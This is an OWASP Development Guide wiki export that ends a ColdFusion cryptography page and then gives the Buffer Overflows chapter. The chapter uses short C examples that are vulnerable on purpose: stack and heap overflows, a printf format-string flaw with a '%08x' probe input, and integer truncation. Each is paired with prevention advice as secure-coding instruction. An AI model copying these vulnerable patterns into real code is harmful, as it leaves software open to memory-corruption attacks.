'''Rand''' – Use to generate a pseudo-random number&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''	rand([algorithm])'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Randomize''' – Use to seed the pseudo-random number generator (PRNG) with an integer.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''	randomize(number [, algorithm])'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''RandRange''' – Use to generate a pseudo-random integer within the range of the specified numbers&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''	randrange(number1, number2 [, algorithm])'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The following values are the allowed algorithm parameters:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
CFMX_COMPAT: (default) – Invokes java.util.Random&lt;br /&gt;
&lt;br /&gt;
SHA1PRNG: (recommended) – Invokes java.security.SecureRandom using the Sun Java SHA-1 PRNG algorithm.&lt;br /&gt;
&lt;br /&gt;
IBMSecureRandom: Use this algorithm on IBM WebSphere, whose JVM does not support the SHA1PRNG algorithm. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Symmetric Encryption'''&lt;br /&gt;
&lt;br /&gt;
ColdFusion MX 7 provides six encryption functions: decrypt(), decryptBinary(), encrypt(), encryptBinary(), generateSecretKey(), and hash(). Function descriptions and syntax:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Decrypt''' – Use to decrypt encrypted strings with specified key, algorithm, encoding, initialization vector or salt, and iterations&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''	decrypt(encrypted_string, key[, algorithm[, encoding[, IVorSalt[, iterations]]]])'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''DecryptBinary''' – Use to decrypt encrypted binary data with specified key, algorithm, initialization vector or salt, and iterations&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''	decryptBinary(bytes, key[, algorithm[, IVorSalt[, iterations]]])'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Encrypt''' – Use to encrypt string using specific algorithm, encoding, initialization vector or salt, and iterations&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''	encrypt(string, key[, algorithm[, encoding[, IVorSalt[, iterations]]]])'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''EncryptBinary''' – Use to encrypt binary data with specified key, algorithm, initialization vector or salt, and iterations&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''	encryptBinary(bytes, key[, algorithm[, IVorSalt[, iterations]]])'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''GenerateSecretKey''' – Use to generate a secure key using the specified algorithm for the encrypt and encryptBinary functions&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''	generateSecretKey(algorithm)'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Hash '''– Use for one-way conversion of a variable-length string to fixed-length string using the specified algorithm and encoding&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''	hash(string[, algorithm[, encoding]] )'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
ColdFusion offers the following default algorithms for these functions:&lt;br /&gt;
&lt;br /&gt;
CFMX_COMPAT: the algorithm used in ColdFusion MX and prior releases. This algorithm is the least secure option (default). &lt;br /&gt;
&lt;br /&gt;
AES: the Advanced Encryption Standard specified by the National Institute of Standards and Technology (NIST) FIPS-197. (recommended)&lt;br /&gt;
&lt;br /&gt;
BLOWFISH: the Blowfish algorithm defined by Bruce Schneier. &lt;br /&gt;
&lt;br /&gt;
DES: the Data Encryption Standard algorithm defined by NIST FIPS-46-3. &lt;br /&gt;
&lt;br /&gt;
DESEDE: the &amp;quot;Triple DES&amp;quot; algorithm defined by NIST FIPS-46-3. &lt;br /&gt;
&lt;br /&gt;
PBEWithMD5AndDES: A password-based version of the DES algorithm which uses an MD5 hash of the specified password as the encryption key &lt;br /&gt;
&lt;br /&gt;
PBEWithMD5AndTripleDES: A password-based version of the DESEDE algorithm which uses an MD5 hash of the specified password as the encryption key&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The following algorithms are provided by default for the hash() function. Note that the SHA algorithms used in ColdFusion are NIST FIPS-180-2 compliant:&lt;br /&gt;
&lt;br /&gt;
CFMX_COMPAT: Generates an MD5 hash string identical to that generated by ColdFusion MX and ColdFusion MX 6.1 (default). &lt;br /&gt;
&lt;br /&gt;
MD5: Generates a 128-bit digest.&lt;br /&gt;
&lt;br /&gt;
SHA: Generates a 160-bit digest. (SHA-1)&lt;br /&gt;
&lt;br /&gt;
SHA-256: Generates a 256-bit digest&lt;br /&gt;
&lt;br /&gt;
SHA-384: Generates a 384-bit digest&lt;br /&gt;
&lt;br /&gt;
SHA-512: Generates a 512-bit digest&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Pluggable Encryption'''&lt;br /&gt;
&lt;br /&gt;
ColdFusion MX 7 introduced pluggable encryption for CFML. The JCE allows developers to specify multiple cryptographic service providers. ColdFusion can leverage the algorithms, feedback modes, and padding methods of third-party Java security providers to strengthen its cryptography functions. For example, ColdFusion can leverage the Bouncy Castle (&amp;lt;u&amp;gt;http://www.bouncycastle.org/&amp;lt;/u&amp;gt;) crypto package and use the SHA-224 algorithm for the hash() function or the Serpent block cipher for the encrypt() function.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
See Macromedia’s Strong Encryption in ColdFusion MX 7 technote for information on installing additional security providers for ColdFusion at http://www.macromedia.com/go/e546373d. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''SSL'''&lt;br /&gt;
&lt;br /&gt;
ColdFusion does not provide tags and functions for public-key encryption, but it can communicate over SSL. ColdFusion leverages the Sun JSSE to communicate over SSL with web and LDAP (Lightweight Directory Access Protocol) servers. ColdFusion uses the Java certificate database (e.g. jre_root/lib/security/cacerts) to store server certificates. It compares the certificates presented by remote systems against those stored in the database. It also retrieves the host system’s certificate from this database and presents it to remote systems to initiate the SSL handshake. Certificate information is then exposed as CGI variables.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''''Best Practices'''''&lt;br /&gt;
&lt;br /&gt;
*Enable /dev/urandom for higher entropy for random number generation&lt;br /&gt;
&lt;br /&gt;
*Call the randomize function before calling rand() or randRange() to seed the random number generator&lt;br /&gt;
&lt;br /&gt;
*DO NOT use the CFMX_COMPAT algorithms. Upgrade your application to use stronger cryptographic ciphers.&lt;br /&gt;
&lt;br /&gt;
*Use AES or higher for symmetric encryption &lt;br /&gt;
&lt;br /&gt;
*Use SHA-256 or higher for the hash function&lt;br /&gt;
&lt;br /&gt;
*Use a salt (or random string) for password generation with the hash function&lt;br /&gt;
&lt;br /&gt;
*Always use generateSecretKey() to generate keys of the appropriate length for Block Encryption algorithms unless a customized key is required&lt;br /&gt;
&lt;br /&gt;
*Use separate key databases to store remote server certificates separately from the ColdFusion server’s certificate&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Guide Table of Contents|Development Guide Table of Contents]]&lt;br /&gt;
[[Category:OWASP_Guide_Project]]&lt;br /&gt;
[[Category:Encryption]]&lt;/div&gt;</summary>
		<author><name>KirstenS</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Buffer_Overflows&amp;diff=59856</id>
		<title>Buffer Overflows</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Buffer_Overflows&amp;diff=59856"/>
				<updated>2009-05-02T11:47:52Z</updated>
		
		<summary type="html">&lt;p&gt;KirstenS: /* Further reading */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Guide Table of Contents|Development Guide Table of Contents]]__TOC__'''&lt;br /&gt;
&lt;br /&gt;
==Objective ==&lt;br /&gt;
&lt;br /&gt;
To ensure that:&lt;br /&gt;
&lt;br /&gt;
* Applications do not expose themselves to faulty components.&lt;br /&gt;
&lt;br /&gt;
* Applications create as few buffer overflows as possible.&lt;br /&gt;
&lt;br /&gt;
* Developers are encouraged to use languages and frameworks that are relatively immune to buffer overflows.&lt;br /&gt;
&lt;br /&gt;
==Platforms Affected ==&lt;br /&gt;
&lt;br /&gt;
Almost every platform, with the following notable exceptions:&lt;br /&gt;
&lt;br /&gt;
* Java/J2EE – as long as native methods or system calls are not invoked.&lt;br /&gt;
&lt;br /&gt;
* .NET – as long as unsafe or unmanaged code is not invoked (such as the use of P/Invoke or COM Interop).&lt;br /&gt;
&lt;br /&gt;
* PHP, Python, Perl – as long as external programs or vulnerable extensions are not used.&lt;br /&gt;
&lt;br /&gt;
==Relevant COBIT Topics ==&lt;br /&gt;
&lt;br /&gt;
DS11.9 – Data processing integrity.&lt;br /&gt;
&lt;br /&gt;
==Description ==&lt;br /&gt;
&lt;br /&gt;
Attackers generally use [[Buffer Overflow|buffer overflows]] to corrupt the execution stack of a web application. By sending carefully crafted input to a web application, an attacker can cause the web application to execute arbitrary code, possibly taking over the machine. Attackers have managed to identify buffer overflows in a staggering array of products and components. &lt;br /&gt;
&lt;br /&gt;
Buffer overflow flaws can be present in both the web server and application server products that serve the static and dynamic portions of a site, or in the web application itself. Buffer overflows found in commonly-used server products are likely to become widely known and can pose a significant risk to users of these products. When web applications use libraries, such as a graphics library to generate images or a communications library to send e-mail, they open themselves to potential buffer overflow attacks. Literature detailing buffer overflow attacks against commonly-used products is readily available, and newly discovered vulnerabilities are reported almost daily. &lt;br /&gt;
&lt;br /&gt;
Buffer overflows can also be found in custom web application code, and may even be more likely, given the lack of scrutiny that web applications typically go through. Buffer overflow attacks against customized web applications can sometimes lead to interesting results. In some cases, we have discovered that sending large inputs can cause the web application or the back-end database to malfunction. It is possible to cause a denial of service attack against the web site, depending on the severity and specific nature of the flaw. Overly large inputs could cause the application to display a detailed error message, potentially leading to a successful attack on the system.&lt;br /&gt;
&lt;br /&gt;
Buffer overflow attacks generally rely upon two techniques (and usually a combination of the two):&lt;br /&gt;
&lt;br /&gt;
* Writing data to particular memory addresses&lt;br /&gt;
&lt;br /&gt;
* Having the operating system mishandle data types&lt;br /&gt;
&lt;br /&gt;
This means that strongly-typed programming languages (and environments) that disallow direct memory access usually prevent buffer overflows from happening.&lt;br /&gt;
&lt;br /&gt;
{| border=1&lt;br /&gt;
|-&lt;br /&gt;
 ! Language/Environment !! Compiled or Interpreted !! Strongly Typed !! Direct Memory Access !! Safe or Unsafe&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
 | Java, Java Virtual Machine (JVM) || Both || Yes || No || Safe&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
 | .NET || Both || Yes || No || Safe&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
 | Perl || Both || Yes || No || Safe&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
 | Python || Interpreted || Yes || No || Safe&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
 | Ruby || Interpreted || Yes || No || Safe&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
 | C/C++ || Compiled || No || Yes || Unsafe&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
 | Assembly || Compiled || No || Yes || Unsafe&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
 | COBOL || Compiled || Yes || No || Safe&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
Table 8.1: Language descriptions&lt;br /&gt;
&lt;br /&gt;
==General Prevention Techniques ==&lt;br /&gt;
&lt;br /&gt;
A number of general techniques to prevent buffer overflows include:&lt;br /&gt;
&lt;br /&gt;
* Code auditing (automated or manual)&lt;br /&gt;
&lt;br /&gt;
* Developer training – bounds checking, use of unsafe functions, and group standards&lt;br /&gt;
&lt;br /&gt;
* Non-executable stacks – many operating systems have at least some support for this&lt;br /&gt;
&lt;br /&gt;
* Compiler tools – StackShield, StackGuard, and Libsafe, among others&lt;br /&gt;
&lt;br /&gt;
* Safe functions – use strncat instead of strcat, strncpy instead of strcpy, etc&lt;br /&gt;
&lt;br /&gt;
* Patches – Be sure to keep your web and application servers fully patched, and be aware of bug reports relating to applications upon which your code is dependent.&lt;br /&gt;
&lt;br /&gt;
* Periodically scan your application with one or more of the commonly available scanners that look for buffer overflow flaws in your server products and your custom web applications. &lt;br /&gt;
&lt;br /&gt;
==Stack Overflow ==&lt;br /&gt;
&lt;br /&gt;
Stack overflows are the best understood and the most common form of buffer overflows. The basic mechanism of a stack overflow is simple:&lt;br /&gt;
&lt;br /&gt;
* There are two buffers: a source buffer containing arbitrary input (presumably from the attacker), and a destination buffer that is too small for the attack input. The destination buffer resides on the stack, adjacent to the function return address.&lt;br /&gt;
&lt;br /&gt;
* The faulty code does ''not'' check that the source buffer is too large to fit in the destination buffer. It copies the attack input to the destination buffer, overwriting additional information on the stack (such as the function return address).&lt;br /&gt;
&lt;br /&gt;
* When the function returns, the CPU unwinds the stack frame and pops the (now modified) return address from the stack.&lt;br /&gt;
&lt;br /&gt;
* Control does not return to the function as it should. Instead, arbitrary code (chosen by the attacker when crafting the initial input) is executed. &lt;br /&gt;
&lt;br /&gt;
The following example, written in C, demonstrates a stack overflow exploit.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#include &amp;lt;string.h&amp;gt;&lt;br /&gt;
&lt;br /&gt;
void f(char* s) {&lt;br /&gt;
    char buffer[10];&lt;br /&gt;
    strcpy(buffer, s);&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
int main(void) {&lt;br /&gt;
    f(&amp;quot;01234567890123456789&amp;quot;);&lt;br /&gt;
    return 0;&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
[root /tmp]# ./stacktest&lt;br /&gt;
&lt;br /&gt;
Segmentation fault&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===How to determine if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
If your program:&lt;br /&gt;
&lt;br /&gt;
* is written in a language (or depends upon a program that is written in a language) that allows buffer overflows to be created (see Table 8.1) AND&lt;br /&gt;
&lt;br /&gt;
* copies data from one buffer on the stack to another without checking sizes first AND&lt;br /&gt;
&lt;br /&gt;
* does not use techniques such as canary values or non-executable stacks to prevent buffer overflows THEN&lt;br /&gt;
&lt;br /&gt;
it is likely that the application is vulnerable to attack.&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
# Deploy on systems capable of using non-executable stacks, such as:&lt;br /&gt;
## AMD and Intel x86-64 chips with associated 64-bit operating systems&lt;br /&gt;
## Windows XP SP2 (both 32- and 64-bit)&lt;br /&gt;
## Windows 2003 SP1 (both 32- and 64-bit)&lt;br /&gt;
## Linux after 2.6.8 on AMD and x86-64 processors in 32- and 64-bit mode&lt;br /&gt;
## OpenBSD (w^x on Intel, AMD, SPARC, Alpha and PowerPC)&lt;br /&gt;
## Solaris 2.6 and later with the “noexec_user_stack” flag enabled&lt;br /&gt;
# Use higher-level programming languages that are strongly typed and that disallow direct memory access. &lt;br /&gt;
# Validate input to prevent unexpected data from being processed, such as being too long, of the wrong data type, containing &amp;quot;junk&amp;quot; characters, etc. &lt;br /&gt;
# If relying upon operating system functions or utilities written in a vulnerable language, ensure that they:&lt;br /&gt;
## use the principle of least privilege&lt;br /&gt;
## use compilers that protect against stack and heap overflows&lt;br /&gt;
## are current in terms of patches&lt;br /&gt;
&lt;br /&gt;
==Heap Overflow ==&lt;br /&gt;
&lt;br /&gt;
Heap overflows are problematic in that they are not necessarily stopped by non-executable stack protections, since the heap is a separate memory region. A heap is an area of memory allocated by the application at run-time to store data. The following example, written in C, shows a heap overflow exploit.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;unistd.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;string.h&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 #define BSIZE 16&lt;br /&gt;
 #define OVERSIZE 8 /* overflow buf1 by OVERSIZE bytes */&lt;br /&gt;
&lt;br /&gt;
 int main(void) {&lt;br /&gt;
    unsigned long b_diff;&lt;br /&gt;
    char *buf0 = (char*)malloc(BSIZE);		// create two buffers&lt;br /&gt;
    char *buf1 = (char*)malloc(BSIZE);&lt;br /&gt;
&lt;br /&gt;
    b_diff = (unsigned long)buf1 - (unsigned long)buf0;	// difference between locations&lt;br /&gt;
    printf(&amp;quot;Initial values:  &amp;quot;);&lt;br /&gt;
    printf(&amp;quot;buf0=%p, buf1=%p, b_diff=0x%lx bytes\n&amp;quot;, buf0, buf1, b_diff);&lt;br /&gt;
&lt;br /&gt;
    memset(buf1, 'A', BSIZE-1), buf1[BSIZE-1] = '\0';&lt;br /&gt;
    printf(&amp;quot;Before overflow: buf1=%s\n&amp;quot;, buf1);&lt;br /&gt;
&lt;br /&gt;
    memset(buf0, 'B', (size_t)(b_diff + OVERSIZE));&lt;br /&gt;
    printf(&amp;quot;After overflow:  buf1=%s\n&amp;quot;, buf1);&lt;br /&gt;
    return 0;&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
[root /tmp]# ./heaptest&lt;br /&gt;
&lt;br /&gt;
Initial values:  buf0=0x9322008, buf1=0x9322020, b_diff=0x18 bytes&lt;br /&gt;
Before overflow: buf1=AAAAAAAAAAAAAAA&lt;br /&gt;
After overflow:  buf1=BBBBBBBBAAAAAAA&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The simple program above shows two buffers being allocated on the heap, with the first buffer being overflowed to overwrite the contents of the second buffer. &lt;br /&gt;
&lt;br /&gt;
===How to determine if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
If your program:&lt;br /&gt;
&lt;br /&gt;
* is written in a language (or depends upon a program that is written in a language)  that allows buffer overflows to be created (see Table 8.1) AND&lt;br /&gt;
&lt;br /&gt;
* copies data from one buffer on the stack to another without checking sizes first AND&lt;br /&gt;
&lt;br /&gt;
* does not use techniques such as canary values to prevent buffer overflows THEN&lt;br /&gt;
&lt;br /&gt;
it is likely that the application is vulnerable to attack.&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
# Use higher-level programming languages that are strongly typed and that disallow direct memory access. &lt;br /&gt;
# Validate input to prevent unexpected data from being processed, such as being too long, of the wrong data type, containing &amp;quot;junk&amp;quot; characters, etc. &lt;br /&gt;
# If relying upon operating system functions or utilities written in a vulnerable language, ensure that they:&lt;br /&gt;
## use the principle of least privilege&lt;br /&gt;
## use compilers that protect against stack and heap overflows&lt;br /&gt;
## are current in terms of patches&lt;br /&gt;
&lt;br /&gt;
==Format String ==&lt;br /&gt;
&lt;br /&gt;
Format string buffer overflows (usually called &amp;quot;format string vulnerabilities&amp;quot;) are highly specialized buffer overflows that can have the same effects as other buffer overflow attacks. Basically, format string vulnerabilities take advantage of the mixture of data and control information in certain functions, such as C/C++'s printf. The easiest way to understand this class of vulnerability is with an example:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
#include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
#include &amp;lt;unistd.h&amp;gt;&lt;br /&gt;
#include &amp;lt;string.h&amp;gt;&lt;br /&gt;
&lt;br /&gt;
int main(void) {&lt;br /&gt;
    char str[100];&lt;br /&gt;
    scanf(&amp;quot;%99s&amp;quot;, str);&lt;br /&gt;
    printf(&amp;quot;%s&amp;quot;, str);&lt;br /&gt;
    return 0;&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
This simple program takes input from the user and displays it back on the screen. The string &amp;lt;code&amp;gt;%s&amp;lt;/code&amp;gt; means that the other parameter, str, should be displayed as a string. This example is ''not'' vulnerable to a format string attack, but if one changes the printf call, it becomes exploitable:&lt;br /&gt;
&lt;br /&gt;
    printf(str);&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
To see how, consider the user entering the special input:&lt;br /&gt;
&lt;br /&gt;
''%08x.%08x.%08x.%08x.%08x''&lt;br /&gt;
&lt;br /&gt;
By constructing input as such, the program can be exploited to print the first five entries from the stack.  &lt;br /&gt;
&lt;br /&gt;
===How to determine if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
If your program:&lt;br /&gt;
&lt;br /&gt;
* uses functions such as printf or snprintf directly, or indirectly through system services (such as syslog) or other wrappers, AND&lt;br /&gt;
&lt;br /&gt;
* the use of such functions allows input from the user to contain control information interpreted by the function itself&lt;br /&gt;
&lt;br /&gt;
it is highly likely that the application is vulnerable to attack.&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
# Use higher-level programming languages that are strongly typed and that disallow direct memory access. &lt;br /&gt;
# Validate input to prevent unexpected data from being processed, such as being too long, of the wrong data type, containing &amp;quot;junk&amp;quot; characters, etc. Specifically check for control information (meta-characters like '%')&lt;br /&gt;
# Avoid the use of functions like printf that allow user input to contain control information&lt;br /&gt;
# If relying upon operating system functions or utilities written in a vulnerable language, ensure that they:&lt;br /&gt;
## use the principle of least privilege&lt;br /&gt;
## use compilers that protect against stack and heap overflows&lt;br /&gt;
## are current in terms of patches&lt;br /&gt;
&lt;br /&gt;
==Unicode Overflow ==&lt;br /&gt;
&lt;br /&gt;
Unicode exploits are a bit more difficult to do than typical buffer overflows as demonstrated in Anley’s 2002 paper, but it is wrong to assume that by using Unicode, you are protected against buffer overflows. Examples of Unicode overflows include Code Red, a devastating worm with an estimated economic cost in the billions of dollars. &lt;br /&gt;
&lt;br /&gt;
===How to determine if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
If your program:&lt;br /&gt;
&lt;br /&gt;
* is written in a language (or depends upon a program that is written in a language) that allows buffer overflows to be created (see Table 8.1) AND&lt;br /&gt;
&lt;br /&gt;
* takes Unicode input from a user AND&lt;br /&gt;
&lt;br /&gt;
* fails to sanitize the input AND&lt;br /&gt;
&lt;br /&gt;
* does not use techniques such as canary values to prevent buffer overflows THEN&lt;br /&gt;
&lt;br /&gt;
it is highly likely that the application is vulnerable to attack.&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself  ===&lt;br /&gt;
&lt;br /&gt;
# Deploy on systems capable of using non-executable stacks, such as:&lt;br /&gt;
## AMD and Intel x86-64 chips with associated 64-bit operating systems&lt;br /&gt;
## Windows XP SP2 (both 32- and 64-bit)&lt;br /&gt;
## Windows 2003 SP1 (both 32- and 64-bit)&lt;br /&gt;
## Linux after 2.6.8 on AMD and x86-64 processors in 32- and 64-bit mode&lt;br /&gt;
## OpenBSD (w^x on Intel, AMD, SPARC, Alpha and PowerPC)&lt;br /&gt;
## Solaris 2.6 and later with the “noexec_user_stack” flag enabled&lt;br /&gt;
# Use higher-level programming languages that are strongly typed and that disallow direct memory access. &lt;br /&gt;
# Validate input to prevent unexpected data from being processed, such as being too long, of the wrong data type, containing &amp;quot;junk&amp;quot; characters, etc. &lt;br /&gt;
# If relying upon operating system functions or utilities written in a vulnerable language, ensure that they:&lt;br /&gt;
## use the principle of least privilege&lt;br /&gt;
## use compilers that protect against stack and heap overflows&lt;br /&gt;
## are current in terms of patches&lt;br /&gt;
&lt;br /&gt;
==Integer Overflow ==&lt;br /&gt;
&lt;br /&gt;
When an application takes two numbers of fixed word size and performs an operation with them, the result may not fit within the same word size. For example, if the two 8-bit numbers 192 and 208 are added together and stored into another 8-bit byte, the result will not fit into an 8-bit result:&lt;br /&gt;
&lt;br /&gt;
''         1100 0000''&lt;br /&gt;
&lt;br /&gt;
''  +      1101 0000''&lt;br /&gt;
&lt;br /&gt;
''  = 0001 1001 0000''&lt;br /&gt;
&lt;br /&gt;
In some languages such an operation raises an exception, but in C (and many others) the result silently wraps, so your application must check for overflow itself and take proper action. Otherwise, your application would report that 192 + 208 equals 144.&lt;br /&gt;
&lt;br /&gt;
The following code demonstrates a buffer overflow, and was adapted from [http://www.phrack.org/phrack/60/p60-0x0a.txt Blexim's Phrack article]: [[Category:FIXME|broken link]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
#include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
#include &amp;lt;string.h&amp;gt;&lt;br /&gt;
&lt;br /&gt;
int main(int argc, char *argv[]) {&lt;br /&gt;
    int i = atoi(argv[1]);         // input from user&lt;br /&gt;
    unsigned short s = i;          // truncate to a short&lt;br /&gt;
    char buf[50];                  // large buffer&lt;br /&gt;
&lt;br /&gt;
    if (s &amp;gt; 10) {                  // check we're not greater than 10&lt;br /&gt;
        return 1;&lt;br /&gt;
    }&lt;br /&gt;
&lt;br /&gt;
    memcpy(buf, argv[2], i);       // copy i bytes to the buffer&lt;br /&gt;
    buf[i] = '\0';                 // add a null byte to the buffer&lt;br /&gt;
    printf(&amp;quot;%s\n&amp;quot;, buf);           // output the buffer contents&lt;br /&gt;
&lt;br /&gt;
    return 0;&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
[root /tmp]# ./inttest 65580 foobar&lt;br /&gt;
Segmentation fault&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The above code is exploitable because the validation does not occur on the input value (65580), but rather on the value after it has been converted to an unsigned short (44). &lt;br /&gt;
&lt;br /&gt;
Integer overflows can be a problem in any language and can be exploited when integers are used in array indices and implicit short math operations. &lt;br /&gt;
&lt;br /&gt;
===How to determine if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
* Examine use of signed integers, bytes, and shorts.&lt;br /&gt;
&lt;br /&gt;
* Are there cases where these values are used as array indices after performing an arithmetic operation (+, -, *, /, or % (modulo))?&lt;br /&gt;
&lt;br /&gt;
* How would your program react to a negative or zero value for integer values, particularly during array lookups?&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
* If using .NET, use David LeBlanc’s SafeInt class or a similar construct. Otherwise, use a &amp;quot;BigInteger&amp;quot; or &amp;quot;BigDecimal&amp;quot; implementation in cases where it would be hard to validate input yourself.&lt;br /&gt;
&lt;br /&gt;
* If your compiler supports the option, change the default for integers to be unsigned unless otherwise explicitly stated. Use unsigned integers whenever you don't need negative values.&lt;br /&gt;
&lt;br /&gt;
* Use range checking if your language or framework supports it, or be sure to implement range checking yourself after all arithmetic operations.&lt;br /&gt;
&lt;br /&gt;
* Be sure to check for exceptions if your language supports it.&lt;br /&gt;
&lt;br /&gt;
==Further reading ==&lt;br /&gt;
&lt;br /&gt;
* Team Teso, ''Exploiting Format String Vulnerabilities''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.cs.ucsb.edu/~jzhou/security/formats-teso.html&amp;lt;/u&amp;gt; [[category:FIXME | link not working]]&lt;br /&gt;
&lt;br /&gt;
* Newsham, Tim, ''Format String Attacks''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.lava.net/~newsham/format-string-attacks.pdf&amp;lt;/u&amp;gt;  [[category:FIXME | link not working]]&lt;br /&gt;
&lt;br /&gt;
* w00 w00 and Matt Conover, ''Preliminary Heap Overflow Tutorial''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.w00w00.org/files/articles/heaptut.txt&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* Chris Anley, ''Creating Arbitrary Shellcode In Unicode Expanded Strings''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.ngssoftware.com/papers/unicodebo.pdf&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* David LeBlanc, ''Integer Handling with the C++ SafeInt Class''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://msdn.microsoft.com/library/default.asp?url=/library/en-us/dncode/html/secure01142004.asp&amp;lt;/u&amp;gt;     &lt;br /&gt;
&lt;br /&gt;
* Aleph One, ''Smashing the Stack for fun and profit''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.phrack.org/phrack/49/P49-14&amp;lt;/u&amp;gt;  [[category:FIXME | link not working]]&lt;br /&gt;
&lt;br /&gt;
* Mark Donaldson, ''Inside the Buffer Overflow Attack: Mechanism, Method, &amp;amp; Prevention''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://rr.sans.org/code/inside_buffer.php&amp;lt;/u&amp;gt;   [[category:FIXME | link not working]]&lt;br /&gt;
&lt;br /&gt;
* ''NX Bit'', Wikipedia article&lt;br /&gt;
&lt;br /&gt;
